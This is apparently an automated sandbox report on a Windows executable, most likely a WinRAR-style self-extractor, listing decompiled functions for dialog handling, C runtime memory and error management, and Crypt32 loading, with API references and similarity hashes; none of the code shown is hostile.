                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _memcmp$Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                • String ID: +x
                                                                                                                • API String ID: 3520290970-1066936496
                                                                                                                • Opcode ID: 7a7657148915ec5fbe7ede312b33e2340bb53c192dde00e1f27c86afb2de57ae
                                                                                                                • Instruction ID: 658272d96432a7163955950ea0d1ee736fc00b36fe66041f16662fd51370ab2a
                                                                                                                • Opcode Fuzzy Hash: 7a7657148915ec5fbe7ede312b33e2340bb53c192dde00e1f27c86afb2de57ae
                                                                                                                • Instruction Fuzzy Hash: 5981AE716003098FD714DF28ED85E3AB7A5FB88314F28166EE959E73A5DB31AC02DB41
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED1E90, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 65%
                                                                                                                			E00ED1E90(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				void* _t12;
				WCHAR* _t16;
				void* _t17;
				intOrPtr _t18;
				void* _t19;
				struct HWND__* _t21;
				signed short _t22;

				_t16 = _a16;
				_t22 = _a12;
				_t21 = _a4;
				_t18 = _a8;
				if(E00EC11DA(_t17, _t21, _t18, _t22, _t16, L"RENAMEDLG", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t19 = _t18 - 0x110;
				if(_t19 == 0) {
					 *0xf2331c = _t16;
					SetDlgItemTextW(_t21, 0x66, _t16);
					SetDlgItemTextW(_t21, 0x68,  *0xf2331c);
					goto L10;
				}
				if(_t19 != 1) {
					L5:
					return 0;
				}
				_t12 = (_t22 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t21, 0x68,  *0xf2331c, 0x800);
					_push(1);
					L7:
					 *0xf2609c(_t21);
					goto L10;
				}
				if(_t12 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}










                                                                                                                0x00ed1e91
                                                                                                                0x00ed1e96
                                                                                                                0x00ed1e9b
                                                                                                                0x00ed1ea0
                                                                                                                0x00ed1eb8
                                                                                                                0x00ed1f1a
                                                                                                                0x00000000
                                                                                                                0x00ed1f1c
                                                                                                                0x00ed1eba
                                                                                                                0x00ed1ec0
                                                                                                                0x00ed1eff
                                                                                                                0x00ed1f05
                                                                                                                0x00ed1f14
                                                                                                                0x00000000
                                                                                                                0x00ed1f14
                                                                                                                0x00ed1ec5
                                                                                                                0x00ed1ed4
                                                                                                                0x00000000
                                                                                                                0x00ed1ed4
                                                                                                                0x00ed1eca
                                                                                                                0x00ed1ecd
                                                                                                                0x00ed1ef1
                                                                                                                0x00ed1ef7
                                                                                                                0x00ed1eda
                                                                                                                0x00ed1edb
                                                                                                                0x00000000
                                                                                                                0x00ed1edb
                                                                                                                0x00ed1ed2
                                                                                                                0x00ed1ed8
                                                                                                                0x00000000
                                                                                                                0x00ed1ed8
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00EC11DA: GetDlgItem.USER32(00000000,00003021), ref: 00EC121E
                                                                                                                  • Part of subcall function 00EC11DA: SetWindowTextW.USER32(00000000,00EE7544), ref: 00EC1234
                                                                                                                • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00ED1EF1
                                                                                                                • SetDlgItemTextW.USER32(?,00000066,?), ref: 00ED1F05
                                                                                                                • SetDlgItemTextW.USER32(?,00000068), ref: 00ED1F14
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ItemText$Window
                                                                                                                • String ID: Ht>*$RENAMEDLG
                                                                                                                • API String ID: 2802354418-1016137746
                                                                                                                • Opcode ID: ea379920c1094362c9a028e4c2a2e88810dc426021565601596190ec232c1c0e
                                                                                                                • Instruction ID: 83b4d4ad4ba360119bc30ac75d6998aae6de5d976719ac1855fc7c17f2d456e9
                                                                                                                • Opcode Fuzzy Hash: ea379920c1094362c9a028e4c2a2e88810dc426021565601596190ec232c1c0e
                                                                                                                • Instruction Fuzzy Hash: 6A012D333443587BD2218F659D08FA7379CEB59B06F102046F781B11D1C7619A03A775
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EDC548, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00EDC53D,00000003,?,00EDC4DD,00000003,00EEF368,0000000C,00EDC5F0,00000003,00000002), ref: 00EDC568
                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00EDC57B
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00EDC53D,00000003,?,00EDC4DD,00000003,00EEF368,0000000C,00EDC5F0,00000003,00000002,00000000), ref: 00EDC59E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                • Opcode ID: 5fe3cec220476198753237cd38f65943419e14b2d0f4e3324ab6445aea15fbf1
                                                                                                                • Instruction ID: e8b1ef5582e4f3fc570cfcf10a97537aed514de164ee76de9f945ee32ed37fe7
                                                                                                                • Opcode Fuzzy Hash: 5fe3cec220476198753237cd38f65943419e14b2d0f4e3324ab6445aea15fbf1
                                                                                                                • Instruction Fuzzy Hash: 83F0A47060024CFFCB106BA6EC49B9DBFF4EF08755F100195F805B6260DB305E46CA51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC8049, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 37COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _swprintf
                                                                                                                • String ID: Du$Du$z%s%02d$z%s%d
                                                                                                                • API String ID: 589789837-664004839
                                                                                                                • Opcode ID: 0201c8c9e491fa736780c0f51544b047fd1fcc82a661787b5eeec4af9abea997
                                                                                                                • Instruction ID: a1ef89b6916f456c5fcb8a7c477f4608926e3ba52471b1739c20269c397a598b
                                                                                                                • Opcode Fuzzy Hash: 0201c8c9e491fa736780c0f51544b047fd1fcc82a661787b5eeec4af9abea997
                                                                                                                • Instruction Fuzzy Hash: B9F0C2B110424C6AEF049A50CF03EBAB75AEB48300F046199FD5076152EA639D9B82A0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC56F3, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00EC56F3(struct HINSTANCE__** __ecx) {
				void* _t5;
				struct HINSTANCE__* _t6;
				struct HINSTANCE__** _t9;

				_t9 = __ecx;
				if(__ecx[1] == 0) {
					_t6 = E00EC69F6(L"Crypt32.dll");
					 *__ecx = _t6;
					if(_t6 != 0) {
						_t9[2] = GetProcAddress(_t6, "CryptProtectMemory");
						_t6 = GetProcAddress( *_t9, "CryptUnprotectMemory");
						_t9[3] = _t6;
					}
					_t9[1] = 1;
					return _t6;
				}
				return _t5;
			}






                                                                                                                0x00ec56f4
                                                                                                                0x00ec56fa
                                                                                                                0x00ec5701
                                                                                                                0x00ec5706
                                                                                                                0x00ec570a
                                                                                                                0x00ec571f
                                                                                                                0x00ec5722
                                                                                                                0x00ec5728
                                                                                                                0x00ec5728
                                                                                                                0x00ec572b
                                                                                                                0x00000000
                                                                                                                0x00ec572b
                                                                                                                0x00ec5730

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00EC69F6: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00EC6A11
                                                                                                                  • Part of subcall function 00EC69F6: LoadLibraryW.KERNELBASE(?,?,00EC5706,Crypt32.dll,00000000,00EC578A,?,?,00EC576C,?,?,?,?), ref: 00EC6A33
                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00EC5712
                                                                                                                • GetProcAddress.KERNEL32(00EFAFE0,CryptUnprotectMemory), ref: 00EC5722
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                • API String ID: 2141747552-1753850145
                                                                                                                • Opcode ID: 746de77173dd4bae53703370b059d6ac0aabcb53c155bf9431dd7f9dec77723a
                                                                                                                • Instruction ID: 3a2885d56c5ab02af97947085db45db79c587fc539e636888c6700b6a73f1c0e
                                                                                                                • Opcode Fuzzy Hash: 746de77173dd4bae53703370b059d6ac0aabcb53c155bf9431dd7f9dec77723a
                                                                                                                • Instruction Fuzzy Hash: 52E04F71408B86DEC7216F3AAE89B427FD49B18714B00995EF0D5B2641D6B5E4C28B10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EDCD69, Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E00EDCD69(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0xef1558; // 0xf529bb33
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E00EDD17B( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E00ED33D1(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E00ED33D1(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E00ED33D1(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E00EE0763(_t56);
						_t40 = E00EDD5AA(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E00EE0763(_t56);
						E00EDD5AA(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0xef1558;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

























                                                                                                                0x00edcd69
                                                                                                                0x00edcd73
                                                                                                                0x00edcd77
                                                                                                                0x00edcd79
                                                                                                                0x00edcd7d
                                                                                                                0x00edcd87
                                                                                                                0x00edcd98
                                                                                                                0x00edcd9d
                                                                                                                0x00edcd9f
                                                                                                                0x00edcda1
                                                                                                                0x00edcda3
                                                                                                                0x00edcda5
                                                                                                                0x00edcda9
                                                                                                                0x00edce63
                                                                                                                0x00edce71
                                                                                                                0x00edce73
                                                                                                                0x00edce78
                                                                                                                0x00edce7f
                                                                                                                0x00edce81
                                                                                                                0x00edce8f
                                                                                                                0x00edce9e
                                                                                                                0x00edcea1
                                                                                                                0x00edcea3
                                                                                                                0x00000000
                                                                                                                0x00edcea4
                                                                                                                0x00edcdb1
                                                                                                                0x00edcdb6
                                                                                                                0x00edcdbb
                                                                                                                0x00edcdbd
                                                                                                                0x00edcdbd
                                                                                                                0x00edcdbf
                                                                                                                0x00edcdc4
                                                                                                                0x00edcdc8
                                                                                                                0x00edcdc8
                                                                                                                0x00edcdcb
                                                                                                                0x00edcdea
                                                                                                                0x00edcdea
                                                                                                                0x00edcdec
                                                                                                                0x00edcdef
                                                                                                                0x00edcdf8
                                                                                                                0x00edcdfb
                                                                                                                0x00edce00
                                                                                                                0x00edce03
                                                                                                                0x00edce08
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edce0a
                                                                                                                0x00000000
                                                                                                                0x00edcdcd
                                                                                                                0x00edcdcd
                                                                                                                0x00edcdcf
                                                                                                                0x00edcdd8
                                                                                                                0x00edcddb
                                                                                                                0x00edcde0
                                                                                                                0x00edcde3
                                                                                                                0x00edcde8
                                                                                                                0x00edce12
                                                                                                                0x00edce15
                                                                                                                0x00edce17
                                                                                                                0x00edce1a
                                                                                                                0x00edce22
                                                                                                                0x00edce28
                                                                                                                0x00edce2f
                                                                                                                0x00edce31
                                                                                                                0x00edce39
                                                                                                                0x00edce48
                                                                                                                0x00edce4c
                                                                                                                0x00edce4e
                                                                                                                0x00edce51
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00edce53
                                                                                                                0x00edce56
                                                                                                                0x00edce58
                                                                                                                0x00edce58
                                                                                                                0x00edce59
                                                                                                                0x00edce5b
                                                                                                                0x00edce5e
                                                                                                                0x00000000
                                                                                                                0x00edce58
                                                                                                                0x00000000
                                                                                                                0x00edcde8
                                                                                                                0x00edcdcb
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _free
                                                                                                                • String ID:
                                                                                                                • API String ID: 269201875-0
                                                                                                                • Opcode ID: bf88e3b5605e108a1817a2dcef82ac6391fe4925b68b0a576b2bfa5fb960261f
                                                                                                                • Instruction ID: 25a3f0b0c72ebab5d56ed0facc594912931ddf05396a6eed329c077ee9daf61f
                                                                                                                • Opcode Fuzzy Hash: bf88e3b5605e108a1817a2dcef82ac6391fe4925b68b0a576b2bfa5fb960261f
                                                                                                                • Instruction Fuzzy Hash: 2641D472A002049FCB20DF79CD81A6DB7E5EF88714B2555AAE915FB341DB31ED02CB81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EE06E0, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E00EE06E0() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E00EE06A9(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E00EDD5E4(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E00EDD5AA(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












                                                                                                                0x00ee06ef
                                                                                                                0x00ee06f5
                                                                                                                0x00ee074d
                                                                                                                0x00ee074d
                                                                                                                0x00ee06f7
                                                                                                                0x00ee06f8
                                                                                                                0x00ee06fd
                                                                                                                0x00ee0706
                                                                                                                0x00ee070c
                                                                                                                0x00ee0712
                                                                                                                0x00ee0717
                                                                                                                0x00000000
                                                                                                                0x00ee0719
                                                                                                                0x00ee071f
                                                                                                                0x00ee0724
                                                                                                                0x00ee0742
                                                                                                                0x00ee073c
                                                                                                                0x00ee073c
                                                                                                                0x00ee073e
                                                                                                                0x00ee073e
                                                                                                                0x00ee0745
                                                                                                                0x00ee074a
                                                                                                                0x00ee0717
                                                                                                                0x00ee0751
                                                                                                                0x00ee0754
                                                                                                                0x00ee0754
                                                                                                                0x00ee0762

                                                                                                                APIs
                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00EE06E9
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EE070C
                                                                                                                  • Part of subcall function 00EDD5E4: RtlAllocateHeap.NTDLL(00000000,?,?,?,00ED8A0E,?,0000015D,?,?,?,?,00ED9EEA,000000FF,00000000,?,?), ref: 00EDD616
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00EE0732
                                                                                                                • _free.LIBCMT ref: 00EE0745
                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EE0754
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 336800556-0
                                                                                                                • Opcode ID: a6dcd3cd75bd30b6829c0b987fd94ce9655bcb9f7f1f73aac2f9ab83c450aae0
                                                                                                                • Instruction ID: f2fd4b13fc91d40c0345e143e19932e88c5f89c144ee3ff9f32c68d2e5241533
                                                                                                                • Opcode Fuzzy Hash: a6dcd3cd75bd30b6829c0b987fd94ce9655bcb9f7f1f73aac2f9ab83c450aae0
                                                                                                                • Instruction Fuzzy Hash: 3E01F77260529DBF232136B76CCCC7F6A6DEFC2BB4314112AF948F7240DAA09C4285B0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EDE099, Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E00EDE099(void* __ecx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t15;
				long _t16;

				_t11 = __ecx;
				_t16 = GetLastError();
				_t10 = 0;
				_t2 =  *0xef159c; // 0x6
				_t19 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t15 = E00EDD675(_t11, 1, 0x364);
					_pop(_t13);
					if(_t15 != 0) {
						_t4 = E00EDF741(_t13, _t16, __eflags,  *0xef159c, _t15);
						__eflags = _t4;
						if(_t4 != 0) {
							E00EDDE79(_t13, _t15, 0xf258fc);
							E00EDD5AA(_t10);
							__eflags = _t15;
							if(_t15 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t15);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E00EDD5AA();
						L8:
						SetLastError(_t16);
					}
				} else {
					_t15 = E00EDF6EB(_t11, _t16, _t19, _t2);
					if(_t15 != 0) {
						L9:
						SetLastError(_t16);
						_t10 = _t15;
					} else {
						goto L2;
					}
				}
				return _t10;
			}











                                                                                                                0x00ede099
                                                                                                                0x00ede0a4
                                                                                                                0x00ede0a6
                                                                                                                0x00ede0a8
                                                                                                                0x00ede0ad
                                                                                                                0x00ede0b0
                                                                                                                0x00ede0be
                                                                                                                0x00ede0ca
                                                                                                                0x00ede0cd
                                                                                                                0x00ede0d0
                                                                                                                0x00ede0e2
                                                                                                                0x00ede0e7
                                                                                                                0x00ede0e9
                                                                                                                0x00ede0f4
                                                                                                                0x00ede0fa
                                                                                                                0x00ede102
                                                                                                                0x00ede104
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ede0eb
                                                                                                                0x00ede0eb
                                                                                                                0x00000000
                                                                                                                0x00ede0eb
                                                                                                                0x00ede0d2
                                                                                                                0x00ede0d2
                                                                                                                0x00ede0d3
                                                                                                                0x00ede0d3
                                                                                                                0x00ede106
                                                                                                                0x00ede107
                                                                                                                0x00ede107
                                                                                                                0x00ede0b2
                                                                                                                0x00ede0b8
                                                                                                                0x00ede0bc
                                                                                                                0x00ede10f
                                                                                                                0x00ede110
                                                                                                                0x00ede116
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ede0bc
                                                                                                                0x00ede11d

                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,?,00EDD9C2,00EDD6C7,?,00EDE043,00000001,00000364,?,00ED8DFC,?,?,?,00ED8877,00000050), ref: 00EDE09E
                                                                                                                • _free.LIBCMT ref: 00EDE0D3
                                                                                                                • _free.LIBCMT ref: 00EDE0FA
                                                                                                                • SetLastError.KERNEL32(00000000), ref: 00EDE107
                                                                                                                • SetLastError.KERNEL32(00000000), ref: 00EDE110
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 3170660625-0
                                                                                                                • Opcode ID: 5997db99540e1416e85611fdce35402d2ec2071dd53ba29f33fb68ccefb77aed
                                                                                                                • Instruction ID: ecc226943391d41b373a253ea9c35f4480cbf81f675eca5380cf6077114d12c4
                                                                                                                • Opcode Fuzzy Hash: 5997db99540e1416e85611fdce35402d2ec2071dd53ba29f33fb68ccefb77aed
                                                                                                                • Instruction Fuzzy Hash: 8C01D6762096047A832277256C8E96B22AADBC57787203027F51ABA796EEB0CC078161
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EE0FAF, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00EE0FAF(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0xef1c40; // 0xef1c34
					if(_t23 != 0) {
						E00EDD5AA(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xef1c44; // 0xf25d6c
					if(_t24 != 0) {
						E00EDD5AA(_t8);
					}
